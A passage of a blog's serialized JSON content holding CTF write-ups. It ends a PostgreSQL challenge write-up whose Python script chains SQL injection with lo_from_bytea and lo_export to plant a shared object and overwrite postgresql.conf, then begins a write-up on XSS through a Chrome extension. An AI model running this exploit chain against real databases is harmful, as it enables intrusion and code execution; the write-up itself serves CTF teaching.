:10346},"headers ",{"type":33,"tag":128,"props":10348,"children":10349},{"style":312},[10350],{"type":38,"value":315},{"type":33,"tag":128,"props":10352,"children":10353},{"style":312},[10354],{"type":38,"value":762},{"type":33,"tag":128,"props":10356,"children":10357},{"class":130,"line":976},[10358,10363,10368,10372,10376],{"type":33,"tag":128,"props":10359,"children":10360},{"style":676},[10361],{"type":38,"value":10362}," '",{"type":33,"tag":128,"props":10364,"children":10365},{"style":140},[10366],{"type":38,"value":10367},"Cookie",{"type":33,"tag":128,"props":10369,"children":10370},{"style":676},[10371],{"type":38,"value":6040},{"type":33,"tag":128,"props":10373,"children":10374},{"style":312},[10375],{"type":38,"value":284},{"type":33,"tag":128,"props":10377,"children":10378},{"style":151},[10379],{"type":38,"value":10380}," SESSION_COOKIE\n",{"type":33,"tag":128,"props":10382,"children":10383},{"class":130,"line":988},[10384],{"type":33,"tag":128,"props":10385,"children":10386},{"style":312},[10387],{"type":38,"value":854},{"type":33,"tag":128,"props":10389,"children":10390},{"class":130,"line":1001},[10391],{"type":33,"tag":128,"props":10392,"children":10393},{"emptyLinePlaceholder":896},[10394],{"type":38,"value":899},{"type":33,"tag":128,"props":10396,"children":10397},{"class":130,"line":1014},[10398,10403,10408],{"type":33,"tag":128,"props":10399,"children":10400},{"style":300},[10401],{"type":38,"value":10402},"def",{"type":33,"tag":128,"props":10404,"children":10405},{"style":135},[10406],{"type":38,"value":10407}," get_randnum",{"type":33,"tag":128,"props":10409,"children":10410},{"style":312},[10411],{"type":38,"value":10412},"():\n",{"type":33,"tag":128,"props":10414,"children":10415},{"class":130,"line":1026},[10416,10420,10425,10429,10434,10438,10443,10447,10452,10456,10461],{"type":33,"tag":128,"props":10417,"children":10418},{"style":1576},[10419],{"type":38,"value":6810},{"type":33,"tag":128,"props":10421,"children":10422},{"style":323},[10423],{"type":38,"value":10424}," random",{"type":33,"tag":128,"props":10426,"children":10427},{"style":312},[10428],{"type":38,"value":215},{"type":33,"tag":128,"props":10430,"children":10431},{"style":323},[10432],{"type":38,"value":10433},"randint",{"type":33,"tag":128,"props":10435,"children":10436},{"style":312},[10437],{"type":38,"value":5566},{"type":33,"tag":128,"props":10439,"children":10440},{"style":523},[10441],{"type":38,"value":10442},"0",{"type":33,"tag":128,"props":10444,"children":10445},{"style":312},[10446],{"type":38,"value":5584},{"type":33,"tag":128,"props":10448,"children":10449},{"style":523},[10450],{"type":38,"value":10451}," 31337",{"type":33,"tag":128,"props":10453,"children":10454},{"style":300},[10455],{"type":38,"value":9683},{"type":33,"tag":128,"props":10457,"children":10458},{"style":523},[10459],{"type":38,"value":10460},"5",{"type":33,"tag":128,"props":10462,"children":10463},{"style":312},[10464],{"type":38,"value":2427},{"type":33,"tag":128,"props":10466,"children":10467},{"class":130,"line":1038},[10468],{"type":33,"tag":128,"props":10469,"children":10470},{"emptyLinePlaceholder":896},[10471],{"type":38,"value":899},{"type":33,"tag":128,"props":10473,"children":10474},{"class":130,"line":1051},[10475,10479,10484,10488,10493],{"type":33,"tag":128,"props":10476,"children":10477},{"style":300},[10478],{"type":38,"value":10402},{"type":33,"tag":128,"props":10480,"children":10481},{"style":135},[10482],{"type":38,"value":10483}," exec_payload",{"type":33,"tag":128,"props":10485,"children":10486},{"style":312},[10487],{"type":38,"value":5566},{"type":33,"tag":128,"props":10489,"children":10490},{"style":323},[10491],{"type":38,"value":10492},"sql",{"type":33,"tag":128,"props":10494,"children":10495},{"style":312},[10496],{"type":38,"value":10497},"):\n",{"type":33,"tag":128,"props":10499,"children":10500},{"class":130,"line":1063},[10501,10506,10510,10514,10518,10522,10526,10530,10535,10540,10545,10550,10554,10558,10562,10567],{"type":33,"tag":128,"props":10502,"children":10503},{"style":323},[10504],{"type":38,"value":10505}," body ",{"type":33,"tag":128,"props":10507,"children":10508},{"style":312},[10509],{"type":38,"value":315},{"type":33,"tag":128,"props":10511,"children":10512},{"style":312},[10513],{"type":38,"value":5642},{"type":33,"tag":128,"props":10515,"children":10516},{"style":676},[10517],{"type":38,"value":669},{"type":33,"tag":128,"props":10519,"children":10520},{"style":140},[10521],{"type":38,"value":5725},{"type":33,"tag":128,"props":10523,"children":10524},{"style":676},[10525],{"type":38,"value":669},{"type":33,"tag":128,"props":10527,"children":10528},{"style":312},[10529],{"type":38,"value":284},{"type":33,"tag":128,"props":10531,"children":10532},{"style":300},[10533],{"type":38,"value":10534}," f",{"type":33,"tag":128,"props":10536,"children":10537},{"style":140},[10538],{"type":38,"value":10539},"\"users",{"type":33,"tag":128,"props":10541,"children":10542},{"style":151},[10543],{"type":38,"value":10544},"\\\"",{"type":33,"tag":128,"props":10546,"children":10547},{"style":140},[10548],{"type":38,"value":10549}," where 1=(",{"type":33,"tag":128,"props":10551,"children":10552},{"style":151},[10553],{"type":38,"value":7246},{"type":33,"tag":128,"props":10555,"children":10556},{"style":323},[10557],{"type":38,"value":10492},{"type":33,"tag":128,"props":10559,"children":10560},{"style":151},[10561],{"type":38,"value":5730},{"type":33,"tag":128,"props":10563,"children":10564},{"style":140},[10565],{"type":38,"value":10566},")--\"",{"type":33,"tag":128,"props":10568,"children":10569},{"style":312},[10570],{"type":38,"value":854},{"type":33,"tag":128,"props":10572,"children":10573},{"class":130,"line":1076},[10574,10579,10583,10588,10592,10596,10600,10604,10608,10613,10617,10622,10626,10631,10635,10639],{"type":33,"tag":128,"props":10575,"children":10576},{"style":323},[10577],{"type":38,"value":10578}," res ",{"type":33,"tag":128,"props":10580,"children":10581},{"style":312},[10582],{"type":38,"value":315},{"type":33,"tag":128,"props":10584,"children":10585},{"style":323},[10586],{"type":38,"value":10587}," requests",{"type":33,"tag":128,"props":10589,"children":10590},{"style":312},[10591],{"type":38,"value":215},{"type":33,"tag":128,"props":10593,"children":10594},{"style":323},[10595],{"type":38,"value":5561},{"type":33,"tag":128,"props":10597,"children":10598},{"style":312},[10599],{"type":38,"value":5566},{"type":33,"tag":128,"props":10601,"children":10602},{"style":151},[10603],{"type":38,"value":10321},{"type":33,"tag":128,"props":10605,"children":10606},{"style":312},[10607],{"type":38,"value":5584},{"type":33,"tag":128,"props":10609,"children":10610},{"style":306},[10611],{"type":38,"value":10612}," headers",{"type":33,"tag":128,"props":10614,"children":10615},{"style":312},[10616],{"type":38,"value":315},{"type":33,"tag":128,"props":10618,"children":10619},{"style":323},[10620],{"type":38,"value":10621},"headers",{"type":33,"tag":128,"props":10623,"children":10624},{"style":312},[10625],{"type":38,"value":5584},{"type":33,"tag":128,"props":10627,"children":10628},{"style":306},[10629],{"type":38,"value":10630}," json",{"type":33,"tag":128,"props":10632,"children":10633},{"style":312},[10634],{"type":38,"value":315},{"type":33,"tag":128,"props":10636,"children":10637},{"style":323},[10638],{"type":38,"value":5671},{"type":33,"tag":128,"props":10640,"children":10641},{"style":312},[10642],{"type":38,"value":2427},{"type":33,"tag":128,"props":10644,"children":10645},{"class":130,"line":1089},[10646,10651,10655,10660,10664,10669],{"type":33,"tag":128,"props":10647,"children":10648},{"style":437},[10649],{"type":38,"value":10650}," print",{"type":33,"tag":128,"props":10652,"children":10653},{"style":312},[10654],{"type":38,"value":5566},{"type":33,"tag":128,"props":10656,"children":10657},{"style":323},[10658],{"type":38,"value":10659},"res",{"type":33,"tag":128,"props":10661,"children":10662},{"style":312},[10663],{"type":38,"value":215},{"type":33,"tag":128,"props":10665,"children":10666},{"style":323},[10667],{"type":38,"value":10668},"status_code",{"type":33,"tag":128,"props":10670,"children":10671},{"style":312},[10672],{"type":38,"value":2427},{"type":33,"tag":128,"props":10674,"children":10675},{"class":130,"line":1101},[10676],{"type":33,"tag":128,"props":10677,"children":10678},{"style":323},[10679],{"type":38,"value":10680}," \n",{"type":33,"tag":128,"props":10682,"children":10683},{"class":130,"line":1114},[10684],{"type":33,"tag":128,"props":10685,"children":10686},{"emptyLinePlaceholder":896},[10687],{"type":38,"value":899},{"type":33,"tag":128,"props":10689,"children":10690},{"class":130,"line":1127},[10691,10695,10700,10704,10709],{"type":33,"tag":128,"props":10692,"children":10693},{"style":300},[10694],{"type":38,"value":10402},{"type":33,"tag":128,"props":10696,"children":10697},{"style":135},[10698],{"type":38,"value":10699}," file_to_base64",{"type":33,"tag":128,"props":10701,"children":10702},{"style":312},[10703],{"type":38,"value":5566},{"type":33,"tag":128,"props":10705,"children":10706},{"style":323},[10707],{"type":38,"value":10708},"file_path",{"type":33,"tag":128,"props":10710,"children":10711},{"style":312},[10712],{"type":38,"value":10497},{"type":33,"tag":128,"props":10714,"children":10715},{"class":130,"line":1139},[10716,10721,10726,10730,10734,10738,10742,10747,10751,10755,10760,10764],{"type":33,"tag":128,"props":10717,"children":10718},{"style":1576},[10719],{"type":38,"value":10720}," with",{"type":33,"tag":128,"props":10722,"children":10723},{"style":437},[10724],{"type":38,"value":10725}," open",{"type":33,"tag":128,"props":10727,"children":10728},{"style":312},[10729],{"type":38,"value":5566},{"type":33,"tag":128,"props":10731,"children":10732},{"style":323},[10733],{"type":38,"value":10708},{"type":33,"tag":128,"props":10735,"children":10736},{"style":312},[10737],{"type":38,"value":5584},{"type":33,"tag":128,"props":10739,"children":10740},{"style":676},[10741],{"type":38,"value":679},{"type":33,"tag":128,"props":10743,"children":10744},{"style":140},[10745],{"type":38,"value":10746},"rb",{"type":33,"tag":128,"props":10748,"children":10749},{"style":676},[10750],{"type":38,"value":669},{"type":33,"tag":128,"props":10752,"children":10753},{"style":312},[10754],{"type":38,"value":2966},{"type":33,"tag":128,"props":10756,"children":10757},{"style":1576},[10758],{"type":38,"value":10759}," as",{"type":33,"tag":128,"props":10761,"children":10762},{"style":306},[10763],{"type":38,"value":4930},{"type":33,"tag":128,"props":10765,"children":10766},{"style":312},[10767],{"type":38,"value":5318},{"type":33,"tag":128,"props":10769,"children":10770},{"class":130,"line":1152},[10771,10776,10780,10784,10788,10793,10797,10802,10806,10811,10816,10821,10825,10829,10834,10838],{"type":33,"tag":128,"props":10772,"children":10773},{"style":323},[10774],{"type":38,"value":10775}," base64_encoded ",{"type":33,"tag":128,"props":10777,"children":10778},{"style":312},[10779],{"type":38,"value":315},{"type":33,"tag":128,"props":10781,"children":10782},{"style":323},[10783],{"type":38,"value":10200},{"type":33,"tag":128,"props":10785,"children":10786},{"style":312},[10787],{"type":38,"value":215},{"type":33,"tag":128,"props":10789,"children":10790},{"style":323},[10791],{"type":38,"value":10792},"b64encode",{"type":33,"tag":128,"props":10794,"children":10795},{"style":312},[10796],{"type":38,"value":5566},{"type":33,"tag":128,"props":10798,"children":10799},{"style":306},[10800],{"type":38,"value":10801},"file",{"type":33,"tag":128,"props":10803,"children":10804},{"style":312},[10805],{"type":38,"value":215},{"type":33,"tag":128,"props":10807,"children":10808},{"style":323},[10809],{"type":38,"value":10810},"read",{"type":33,"tag":128,"props":10812,"children":10813},{"style":312},[10814],{"type":38,"value":10815},"()).",{"type":33,"tag":128,"props":10817,"children":10818},{"style":323},[10819],{"type":38,"value":10820},"decode",{"type":33,"tag":128,"props":10822,"children":10823},{"style":312},[10824],{"type":38,"value":5566},{"type":33,"tag":128,"props":10826,"children":10827},{"style":676},[10828],{"type":38,"value":669},{"type":33,"tag":128,"props":10830,"children":10831},{"style":140},[10832],{"type":38,"value":10833},"utf-8",{"type":33,"tag":128,"props":10835,"children":10836},{"style":676},[10837],{"type":38,"value":669},{"type":33,"tag":128,"props":10839,"children":10840},{"style":312},[10841],{"type":38,"value":2427},{"type":33,"tag":128,"props":10843,"children":10844},{"class":130,"line":1165},[10845,10849],{"type":33,"tag":128,"props":10846,"children":10847},{"style":1576},[10848],{"type":38,"value":6810},{"type":33,"tag":128,"props":10850,"children":10851},{"style":323},[10852],{"type":38,"value":10853}," base64_encoded\n",{"type":33,"tag":128,"props":10855,"children":10856},{"class":130,"line":1177},[10857],{"type":33,"tag":128,"props":10858,"children":10859},{"emptyLinePlaceholder":896},[10860],{"type":38,"value":899},{"type":33,"tag":128,"props":10862,"children":10863},{"class":130,"line":1189},[10864,10868,10873,10877,10881],{"type":33,"tag":128,"props":10865,"children":10866},{"style":300},[10867],{"type":38,"value":10402},{"type":33,"tag":128,"props":10869,"children":10870},{"style":135},[10871],{"type":38,"value":10872}," read_base64file",{"type":33,"tag":128,"props":10874,"children":10875},{"style":312},[10876],{"type":38,"value":5566},{"type":33,"tag":128,"props":10878,"children":10879},{"style":323},[10880],{"type":38,"value":10708},{"type":33,"tag":128,"props":10882,"children":10883},{"style":312},[10884],{"type":38,"value":10497},{"type":33,"tag":128,"props":10886,"children":10887},{"class":130,"line":1202},[10888,10892,10896,10900,10904,10908,10912,10917,10921,10925,10929,10933],{"type":33,"tag":128,"props":10889,"children":10890},{"style":1576},[10891],{"type":38,"value":10720},{"type":33,"tag":128,"props":10893,"children":10894},{"style":437},[10895],{"type":38,"value":10725},{"type":33,"tag":128,"props":10897,"children":10898},{"style":312},[10899],{"type":38,"value":5566},{"type":33,"tag":128,"props":10901,"children":10902},{"style":323},[10903],{"type":38,"value":10708},{"type":33,"tag":128,"props":10905,"children":10906},{"style":312},[10907],{"type":38,"value":5584},{"type":33,"tag":128,"props":10909,"children":10910},{"style":676},[10911],{"type":38,"value":679},{"type":33,"tag":128,"props":10913,"children":10914},{"style":140},[10915],{"type":38,"value":10916},"r",{"type":33,"tag":128,"props":10918,"children":10919},{"style":676},[10920],{"type":38,"value":669},{"type":33,"tag":128,"props":10922,"children":10923},{"style":312},[10924],{"type":38,"value":2966},{"type":33,"tag":128,"props":10926,"children":10927},{"style":1576},[10928],{"type":38,"value":10759},{"type":33,"tag":128,"props":10930,"children":10931},{"style":306},[10932],{"type":38,"value":4930},{"type":33,"tag":128,"props":10934,"children":10935},{"style":312},[10936],{"type":38,"value":5318},{"type":33,"tag":128,"props":10938,"children":10939},{"class":130,"line":1214},[10940,10945,10949,10953,10957,10961],{"type":33,"tag":128,"props":10941,"children":10942},{"style":323},[10943],{"type":38,"value":10944}," base64_content ",{"type":33,"tag":128,"props":10946,"children":10947},{"style":312},[10948],{"type":38,"value":315},{"type":33,"tag":128,"props":10950,"children":10951},{"style":306},[10952],{"type":38,"value":4930},{"type":33,"tag":128,"props":10954,"children":10955},{"style":312},[10956],{"type":38,"value":215},{"type":33,"tag":128,"props":10958,"children":10959},{"style":323},[10960],{"type":38,"value":10810},{"type":33,"tag":128,"props":10962,"children":10963},{"style":312},[10964],{"type":38,"value":7857},{"type":33,"tag":128,"props":10966,"children":10967},{"class":130,"line":1226},[10968,10972],{"type":33,"tag":128,"props":10969,"children":10970},{"style":1576},[10971],{"type":38,"value":6810},{"type":33,"tag":128,"props":10973,"children":10974},{"style":323},[10975],{"type":38,"value":10976}," base64_content\n",{"type":33,"tag":128,"props":10978,"children":10979},{"class":130,"line":1239},[10980],{"type":33,"tag":128,"props":10981,"children":10982},{"emptyLinePlaceholder":896},[10983],{"type":38,"value":899},{"type":33,"tag":128,"props":10985,"children":10986},{"class":130,"line":1251},[10987,10992,10997,11002,11006,11011,11015],{"type":33,"tag":128,"props":10988,"children":10989},{"style":1576},[10990],{"type":38,"value":10991},"if",{"type":33,"tag":128,"props":10993,"children":10994},{"style":437},[10995],{"type":38,"value":10996}," __name__",{"type":33,"tag":128,"props":10998,"children":10999},{"style":300},[11000],{"type":38,"value":11001}," ==",{"type":33,"tag":128,"props":11003,"children":11004},{"style":676},[11005],{"type":38,"value":679},{"type":33,"tag":128,"props":11007,"children":11008},{"style":140},[11009],{"type":38,"value":11010},"__main__",{"type":33,"tag":128,"props":11012,"children":11013},{"style":676},[11014],{"type":38,"value":669},{"type":33,"tag":128,"props":11016,"children":11017},{"style":312},[11018],{"type":38,"value":5318},{"type":33,"tag":128,"props":11020,"children":11021},{"class":130,"line":1263},[11022],{"type":33,"tag":128,"props":11023,"children":11024},{"style":5541},[11025],{"type":38,"value":11026}," # upload b64 so\n",{"type":33,"tag":128,"props":11028,"children":11029},{"class":130,"line":1276},[11030,11035,11039,11043,11047,11051,11056,11060],{"type":33,"tag":128,"props":11031,"children":11032},{"style":323},[11033],{"type":38,"value":11034}," payload ",{"type":33,"tag":128,"props":11036,"children":11037},{"style":312},[11038],{"type":38,"value":315},{"type":33,"tag":128,"props":11040,"children":11041},{"style":323},[11042],{"type":38,"value":10872},{"type":33,"tag":128,"props":11044,"children":11045},{"style":312},[11046],{"type":38,"value":5566},{"type":33,"tag":128,"props":11048,"children":11049},{"style":676},[11050],{"type":38,"value":669},{"type":33,"tag":128,"props":11052,"children":11053},{"style":140},[11054],{"type":38,"value":11055},"payload.b64",{"type":33,"tag":128,"props":11057,"children":11058},{"style":676},[11059],{"type":38,"value":669},{"type":33,"tag":128,"props":11061,"children":11062},{"style":312},[11063],{"type":38,"value":2427},{"type":33,"tag":128,"props":11065,"children":11066},{"class":130,"line":1288},[11067,11072,11076,11080],{"type":33,"tag":128,"props":11068,"children":11069},{"style":323},[11070],{"type":38,"value":11071}," current_id ",{"type":33,"tag":128,"props":11073,"children":11074},{"style":312},[11075],{"type":38,"value":315},{"type":33,"tag":128,"props":11077,"children":11078},{"style":323},[11079],{"type":38,"value":10407},{"type":33,"tag":128,"props":11081,"children":11082},{"style":312},[11083],{"type":38,"value":7857},{"type":33,"tag":128,"props":11085,"children":11086},{"class":130,"line":1300},[11087],{"type":33,"tag":128,"props":11088,"children":11089},{"style":323},[11090],{"type":38,"value":10680},{"type":33,"tag":128,"props":11092,"children":11093},{"class":130,"line":1313},[11094,11099,11103,11108,11113,11117,11122,11126,11131,11135,11140,11144,11149],{"type":33,"tag":128,"props":11095,"children":11096},{"style":323},[11097],{"type":38,"value":11098}," exec_payload",{"type":33,"tag":128,"props":11100,"children":11101},{"style":312},[11102],{"type":38,"value":5566},{"type":33,"tag":128,"props":11104,"children":11105},{"style":300},[11106],{"type":38,"value":11107},"f",{"type":33,"tag":128,"props":11109,"children":11110},{"style":140},[11111],{"type":38,"value":11112},"\"SELECT lo_from_bytea(",{"type":33,"tag":128,"props":11114,"children":11115},{"style":151},[11116],{"type":38,"value":7246},{"type":33,"tag":128,"props":11118,"children":11119},{"style":323},[11120],{"type":38,"value":11121},"current_id",{"type":33,"tag":128,"props":11123,"children":11124},{"style":151},[11125],{"type":38,"value":5730},{"type":33,"tag":128,"props":11127,"children":11128},{"style":140},[11129],{"type":38,"value":11130},", decode('",{"type":33,"tag":128,"props":11132,"children":11133},{"style":151},[11134],{"type":38,"value":7246},{"type":33,"tag":128,"props":11136,"children":11137},{"style":323},[11138],{"type":38,"value":11139},"payload",{"type":33,"tag":128,"props":11141,"children":11142},{"style":151},[11143],{"type":38,"value":5730},{"type":33,"tag":128,"props":11145,"children":11146},{"style":140},[11147],{"type":38,"value":11148},"', 'base64'))\"",{"type":33,"tag":128,"props":11150,"children":11151},{"style":312},[11152],{"type":38,"value":2427},{"type":33,"tag":128,"props":11154,"children":11155},{"class":130,"line":1327},[11156,11160,11164,11168,11173,11177,11181,11185,11190],{"type":33,"tag":128,"props":11157,"children":11158},{"style":323},[11159],{"type":38,"value":11098},{"type":33,"tag":128,"props":11161,"children":11162},{"style":312},[11163],{"type":38,"value":5566},{"type":33,"tag":128,"props":11165,"children":11166},{"style":300},[11167],{"type":38,"value":11107},{"type":33,"tag":128,"props":11169,"children":11170},{"style":140},[11171],{"type":38,"value":11172},"\"SELECT lo_export(",{"type":33,"tag":128,"props":11174,"children":11175},{"style":151},[11176],{"type":38,"value":7246},{"type":33,"tag":128,"props":11178,"children":11179},{"style":323},[11180],{"type":38,"value":11121},{"type":33,"tag":128,"props":11182,"children":11183},{"style":151},[11184],{"type":38,"value":5730},{"type":33,"tag":128,"props":11186,"children":11187},{"style":140},[11188],{"type":38,"value":11189},", '/tmp/payload.so')\"",{"type":33,"tag":128,"props":11191,"children":11192},{"style":312},[11193],{"type":38,"value":2427},{"type":33,"tag":128,"props":11195,"children":11197},{"class":130,"line":11196},38,[11198],{"type":33,"tag":128,"props":11199,"children":11200},{"emptyLinePlaceholder":896},[11201],{"type":38,"value":899},{"type":33,"tag":128,"props":11203,"children":11205},{"class":130,"line":11204},39,[11206],{"type":33,"tag":128,"props":11207,"children":11208},{"style":5541},[11209],{"type":38,"value":11210}," # upload conf\n",{"type":33,"tag":128,"props":11212,"children":11214},{"class":130,"line":11213},40,[11215,11220,11224,11228,11232,11236,11240,11244],{"type":33,"tag":128,"props":11216,"children":11217},{"style":323},[11218],{"type":38,"value":11219}," conf ",{"type":33,"tag":128,"props":11221,"children":11222},{"style":312},[11223],{"type":38,"value":315},{"type":33,"tag":128,"props":11225,"children":11226},{"style":323},[11227],{"type":38,"value":10699},{"type":33,"tag":128,"props":11229,"children":11230},{"style":312},[11231],{"type":38,"value":5566},{"type":33,"tag":128,"props":11233,"children":11234},{"style":676},[11235],{"type":38,"value":669},{"type":33,"tag":128,"props":11237,"children":11238},{"style":140},[11239],{"type":38,"value":8945},{"type":33,"tag":128,"props":11241,"children":11242},{"style":676},[11243],{"type":38,"value":669},{"type":33,"tag":128,"props":11245,"children":11246},{"style":312},[11247],{"type":38,"value":2427},{"type":33,"tag":128,"props":11249,"children":11251},{"class":130,"line":11250},41,[11252,11256,11260,11264],{"type":33,"tag":128,"props":11253,"children":11254},{"style":323},[11255],{"type":38,"value":11071},{"type":33,"tag":128,"props":11257,"children":11258},{"style":312},[11259],{"type":38,"value":315},{"type":33,"tag":128,"props":11261,"children":11262},{"style":323},[11263],{"type":38,"value":10407},{"type":33,"tag":128,"props":11265,"children":11266},{"style":312},[11267],{"type":38,"value":7857},{"type":33,"tag":128,"props":11269,"children":11271},{"class":130,"line":11270},42,[11272],{"type":33,"tag":128,"props":11273,"children":11274},{"style":323},[11275],{"type":38,"value":10680},{"type":33,"tag":128,"props":11277,"children":11279},{"class":130,"line":11278},43,[11280,11284,11288,11292,11296,11300,11304,11308,11312,11316,11320,11324,11328],{"type":33,"tag":128,"props":11281,"children":11282},{"style":323},[11283],{"type":38,"value":11098},{"type":33,"tag":128,"props":11285,"children":11286},{"style":312},[11287],{"type":38,"value":5566},{"type":33,"tag":128,"props":11289,"children":11290},{"style":300},[11291],{"type":38,"value":11107},{"type":33,"tag":128,"props":11293,"children":11294},{"style":140},[11295],{"type":38,"value":11112},{"type":33,"tag":128,"props":11297,"children":11298},{"style":151},[11299],{"type":38,"value":7246},{"type":33,"tag":128,"props":11301,"children":11302},{"style":323},[11303],{"type":38,"value":11121},{"type":33,"tag":128,"props":11305,"children":11306},{"style":151},[11307],{"type":38,"value":5730},{"type":33,"tag":128,"props":11309,"children":11310},{"style":140},[11311],{"type":38,"value":11130},{"type":33,"tag":128,"props":11313,"children":11314},{"style":151},[11315],{"type":38,"value":7246},{"type":33,"tag":128,"props":11317,"children":11318},{"style":323},[11319],{"type":38,"value":8945},{"type":33,"tag":128,"props":11321,"children":11322},{"style":151},[11323],{"type":38,"value":5730},{"type":33,"tag":128,"props":11325,"children":11326},{"style":140},[11327],{"type":38,"value":11148},{"type":33,"tag":128,"props":11329,"children":11330},{"style":312},[11331],{"type":38,"value":2427},{"type":33,"tag":128,"props":11333,"children":11335},{"class":130,"line":11334},44,[11336,11340,11344,11348,11352,11356,11360,11364,11369],{"type":33,"tag":128,"props":11337,"children":11338},{"style":323},[11339],{"type":38,"value":11098},{"type":33,"tag":128,"props":11341,"children":11342},{"style":312},[11343],{"type":38,"value":5566},{"type":33,"tag":128,"props":11345,"children":11346},{"style":300},[11347],{"type":38,"value":11107},{"type":33,"tag":128,"props":11349,"children":11350},{"style":140},[11351],{"type":38,"value":11172},{"type":33,"tag":128,"props":11353,"children":11354},{"style":151},[11355],{"type":38,"value":7246},{"type":33,"tag":128,"props":11357,"children":11358},{"style":323},[11359],{"type":38,"value":11121},{"type":33,"tag":128,"props":11361,"children":11362},{"style":151},[11363],{"type":38,"value":5730},{"type":33,"tag":128,"props":11365,"children":11366},{"style":140},[11367],{"type":38,"value":11368},", '/var/lib/postgresql/data/postgresql.conf')\"",{"type":33,"tag":128,"props":11370,"children":11371},{"style":312},[11372],{"type":38,"value":2427},{"type":33,"tag":128,"props":11374,"children":11376},{"class":130,"line":11375},45,[11377],{"type":33,"tag":128,"props":11378,"children":11379},{"emptyLinePlaceholder":896},[11380],{"type":38,"value":899},{"type":33,"tag":128,"props":11382,"children":11384},{"class":130,"line":11383},46,[11385],{"type":33,"tag":128,"props":11386,"children":11387},{"style":5541},[11388],{"type":38,"value":11389}," # reload conf\n",{"type":33,"tag":128,"props":11391,"children":11393},{"class":130,"line":11392},47,[11394,11398,11402,11406,11411],{"type":33,"tag":128,"props":11395,"children":11396},{"style":323},[11397],{"type":38,"value":11098},{"type":33,"tag":128,"props":11399,"children":11400},{"style":312},[11401],{"type":38,"value":5566},{"type":33,"tag":128,"props":11403,"children":11404},{"style":300},[11405],{"type":38,"value":11107},{"type":33,"tag":128,"props":11407,"children":11408},{"style":140},[11409],{"type":38,"value":11410},"\"SELECT pg_reload_conf()\"",{"type":33,"tag":128,"props":11412,"children":11413},{"style":312},[11414],{"type":38,"value":2427},{"type":33,"tag":128,"props":11416,"children":11418},{"class":130,"line":11417},48,[11419,11423,11427,11431,11435],{"type":33,"tag":128,"props":11420,"children":11421},{"style":323},[11422],{"type":38,"value":11098},{"type":33,"tag":128,"props":11424,"children":11425},{"style":312},[11426],{"type":38,"value":5566},{"type":33,"tag":128,"props":11428,"children":11429},{"style":300},[11430],{"type":38,"value":11107},{"type":33,"tag":128,"props":11432,"children":11433},{"style":140},[11434],{"type":38,"value":11410},{"type":33,"tag":128,"props":11436,"children":11437},{"style":312},[11438],{"type":38,"value":2427},{"type":33,"tag":128,"props":11440,"children":11442},{"class":130,"line":11441},49,[11443,11447,11451,11455,11459],{"type":33,"tag":128,"props":11444,"children":11445},{"style":323},[11446],{"type":38,"value":11098},{"type":33,"tag":128,"props":11448,"children":11449},{"style":312},[11450],{"type":38,"value":5566},{"type":33,"tag":128,"props":11452,"children":11453},{"style":300},[11454],{"type":38,"value":11107},{"type":33,"tag":128,"props":11456,"children":11457},{"style":140},[11458],{"type":38,"value":11410},{"type":33,"tag":128,"props":11460,"children":11461},{"style":312},[11462],{"type":38,"value":2427},{"type":33,"tag":47,"props":11464,"children":11465},{},[11466,11468,11473],{"type":38,"value":11467},"Once the configuration is reloaded, we can retrieve the flag using the ",{"type":33,"tag":105,"props":11469,"children":11471},{"className":11470},[],[11472],{"type":38,"value":5294},{"type":38,"value":11474}," binary",{"type":33,"tag":75,"props":11476,"children":11478},{"imgSrc":11477,":width":8617},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743113795/writeups/aurors-archive/read_flag.webp",[],{"type":33,"tag":5227,"props":11480,"children":11481},{},[11482],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":11484},[11485,11486,11487,11488],{"id":42,"depth":362,"text":45},{"id":5492,"depth":362,"text":5495},{"id":5910,"depth":362,"text":5913},{"id":8621,"depth":362,"text":8624},"content:writeups:aurors-archive.md","writeups/aurors-archive.md","writeups/aurors-archive",{"_path":11493,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":11494,"description":8,"head":11495,"body":11513,"_type":5240,"_id":22444,"_source":5242,"_file":22445,"_stem":22446,"_extension":5245},"/writeups/shikanoko","Shikanoko",{"title":11494,"description":11496,"keywords":11497,"slug":11498,"image":11499,"date":11500,"meta":11501},"Writeup of Shikanoko a hard web challenge from TCP1P CTF 2024. Is about web-extension and XSS.","web,xss,chrome-extension","shikanoko","https://res.cloudinary.com/dmju5zuhr/image/upload/v1731244700/writeups/tcp1p_ctf.webp","2024-12-10",[11502,11503,11504,11505,11506,11508,11509,11511],{"og:image":11499},{"og:title":11494},{"og:description":11496},{"og:type":21},{"og:url":11507},"https://owalid.com/shikanoko",{"description":11496},{"title":11510},"Shikanoko writeup",{"keywords":11512},"web,xss,chrome-extension,tcp1p,ctf",{"type":30,"children":11514,"toc":22436},[11515,11519,11523,11528,11533,11538,11543,12020,12025,12030,12036,12048,12053,12059,12064,12069,12855,12898,12904,12909,12915,12920,12925,14474,14487,14505,14511,14516,14521,14527,14533,14538,14543,15371,15376,15382,15388,15407,15539,15565,16331,16373,17139,17152,17879,17884,17889,17905,19311,19316,19321,19326,19419,19424,19436,19455,20008,20029,20042,20046,20065,20069,20075,20080,20085,20829,20860,20865,20870,20882,20887,20892,21030,21034,21047,21051,21057,21062,21067,21313,21321,21869,21877,22423,22428,22432],{"type":33,"tag":34,"props":11516,"children":11517},{"id":11498},[11518],{"type":38,"value":11494},{"type":33,"tag":40,"props":11520,"children":11521},{"id":42},[11522],{"type":38,"value":45},{"type":33,"tag":47,"props":11524,"children":11525},{},[11526],{"type":38,"value":11527},"Shikanoko is a hard web challenge from TCP1P CTF 2024. The challenge is about web-extension and XSS.",{"type":33,"tag":47,"props":11529,"children":11530},{},[11531],{"type":38,"value":11532},"The goal of this challenge is to execute JavaScript in the bot's browser context in order to retrieve the flag. The only entry point we can have to exploit an XSS in the bot's context is an extension that is installed in its browser",{"type":33,"tag":75,"props":11534,"children":11537},{"imgSrc":11535,":width":11536},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731247859/writeups/shikanoko/bot_config_webext.webp","650",[],{"type":33,"tag":47,"props":11539,"children":11540},{},[11541],{"type":38,"value":11542},"A web service exposes a simple HTML page; we will see the content of the page in detail later.",{"type":33,"tag":114,"props":11544,"children":11546},{"lang":11545},"yaml",[11547],{"type":33,"tag":119,"props":11548,"children":11551},{"className":11549,"code":11550,"language":11545,"meta":8,"style":8},"language-yaml shiki shiki-themes vitesse-dark","version: '3'\n\nservices:\n proxy:\n image: nginx:latest\n restart: always\n ports:\n - 8547:80\n volumes:\n - ./src:/var/www/html:ro\n - ./proxy.conf:/etc/nginx/conf.d/default.conf:ro\n 